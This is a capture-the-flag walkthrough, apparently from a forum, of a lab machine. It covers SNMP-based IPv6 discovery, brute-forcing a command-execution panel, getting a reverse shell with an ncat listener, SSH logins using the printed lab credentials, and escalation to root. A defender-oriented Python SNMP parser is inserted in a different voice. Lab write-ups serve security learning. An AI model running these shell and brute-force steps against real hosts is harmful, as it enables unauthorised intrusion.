We use a Python script called Enyx to find the IPv6 address of the target machine. You can get the script from this “[link visible only to registered members]”.

git clone https://github.com/trickster0/Enyx.git
python enyx.py 2c public 10.10.10.92

So as you can observe, we have enumerated the IPv6 address of the victim’s machine; further scan it using the nmap command given below:
nmap -6 <target IPV6>

Hmmm!! So along with port 22, this time it also shows port 80 for HTTP services.
[Image: 7.png?w=687]
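Enyx gets the IPv6 address by walking the ipAddressTable (RFC 4293) over SNMP and decoding the table index, which is laid out as <address type>.<length>.<address octets> with type 2 for IPv6. The Python below is an added example, not Enyx's code: it decodes snmpwalk-style rows for the ipAddressIfIndex column (OID 1.3.6.1.2.1.4.34.1.3; the sample rows are constructed for the demonstration, not the page's screenshot) and lists the globally reachable IPv6 addresses, which is the check a defender runs to learn what a guessable read-only community string gives away about a host that looks IPv4-only from the outside.

```python
import ipaddress

# ipAddressIfIndex column of the ipAddressTable (RFC 4293). The row index is
# <ipAddressAddrType>.<address length>.<address octets>; type 1 = IPv4, 2 = IPv6.
IP_ADDRESS_IFINDEX = "1.3.6.1.2.1.4.34.1.3."

# Constructed snmpwalk-style rows (net-snmp prints the root arc as "iso" when no
# MIB is loaded); sample data for the demonstration, not the page's screenshot.
SAMPLE_WALK = """\
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.92 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.127.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.32.1.13.184.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.12.41.255.254.171.205.239 = INTEGER: 2
"""


def parse_ip_address_table(walk_text):
    """Decode every ipAddressIfIndex row into (ifIndex, ip_address) pairs."""
    rows = []
    for line in walk_text.splitlines():
        oid, sep, value = line.strip().partition(" = ")
        if not sep:
            continue
        if oid.startswith("iso."):
            oid = "1." + oid[4:]
        if not oid.startswith(IP_ADDRESS_IFINDEX):
            continue
        index = [int(x) for x in oid[len(IP_ADDRESS_IFINDEX):].split(".")]
        if len(index) < 2:
            continue
        addr_type, length, octets = index[0], index[1], index[2:]
        if len(octets) != length or any(o > 255 for o in octets):
            continue  # malformed index: skip rather than guess
        if addr_type == 1 and length == 4:
            ip = ipaddress.IPv4Address(bytes(octets))
        elif addr_type == 2 and length == 16:
            ip = ipaddress.IPv6Address(bytes(octets))
        else:
            continue  # zoned and other address types are not handled here
        ifindex = int(value.split(":")[-1]) if value.startswith("INTEGER:") else None
        rows.append((ifindex, ip))
    return rows


def global_ipv6_addresses(walk_text):
    """The subset an exposure audit cares about: IPv6 addresses that are neither
    loopback nor link-local and so are reachable beyond the local segment."""
    return sorted(str(ip) for _, ip in parse_ip_address_table(walk_text)
                  if ip.version == 6 and not ip.is_loopback and not ip.is_link_local)


if __name__ == "__main__":
    for ifindex, ip in parse_ip_address_table(SAMPLE_WALK):
        print(f"ifIndex {ifindex}: {ip}")
    print("globally reachable IPv6:", global_ipv6_addresses(SAMPLE_WALK))
```

Pipe the output of `snmpwalk -v2c -c <community> <host> 1.3.6.1.2.1.4.34.1.3` into it to see what your own SNMP agents reveal; the link-local row in the sample also shows how an EUI-64 address embeds the interface MAC. If a host answers a default community string with this table, the fix is to restrict or replace that community (SNMPv3 with authentication), not to hide the IPv6 address.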
So we navigate to the web browser and open the target IPv6 address in the URL; it shows a login page for a command execution panel. We try to log in to this page with the credential we found earlier, but that wasn’t the valid credential.
[Image: 8.png?w=687]
Access Victim’s Shell

Further, I try to brute force the username and successfully log in with the following combination:
Username: administrator
Password: trickeryanddeceit

Since it was a Command Execution Panel where we can run arbitrary system commands, this was RCE, which could be easily exploited to get a reverse shell from the target machine.
[Image: 9.png?w=687]
But before that, you must know the IPv6 address of your local machine, since it will be used as the listening IP.
[Image: 10.1.png?w=687]
For the reverse shell, I used the Python reverse shell one-liner from pentestmonkey, with the lhost set to our IPv6 address. Since both nodes are talking over IPv6, we need a listener that can accept an IPv6 connection, such as ncat, so we started ncat as the listener on port 1234.
ncat -6 -lvp 1234

[Image: 10.png?w=687]
As soon as we execute the Python code, we get a reverse connection on ncat.
Great!! You can observe that we have access to a remote terminal; let’s try to find the user.txt file to complete our first task. We found user.txt in /home/loki but were unable to read it. However, there was another interesting file, “credentials”, and in it we found another credential.
[Image: 11.png?w=687]
As port 22 was open, we connect to the remote machine through ssh using the following credential.
Username: loki
Password: lokiisthebestnorsegod
ssh loki@10.10.10.92

This time we successfully read the user.txt file, as shown below.
[Image: 13.png?w=687]
Privilege Escalation
While exploring further, I found a .bash_history file containing one more credential, for the root user, but loki does not have permission to run the switch user (su) command.
[Image: 14.png?w=687]
Therefore, we move back to the www-data shell, run su with the password found above to log in as root, and look for root.txt inside the root directory, but there was no flag there. So with the help of the find command, we enumerate the path of root.txt.
find / -name root.txt

Booom!! We got the path of the root.txt file, and as you can observe, we have successfully captured the last flag and finished this challenge.
[Image: 15.png?w=687]
[Guide] How to SMB Penetration Testing (Port 445) - by NINZA - 05-14-2020, 11:10 AM


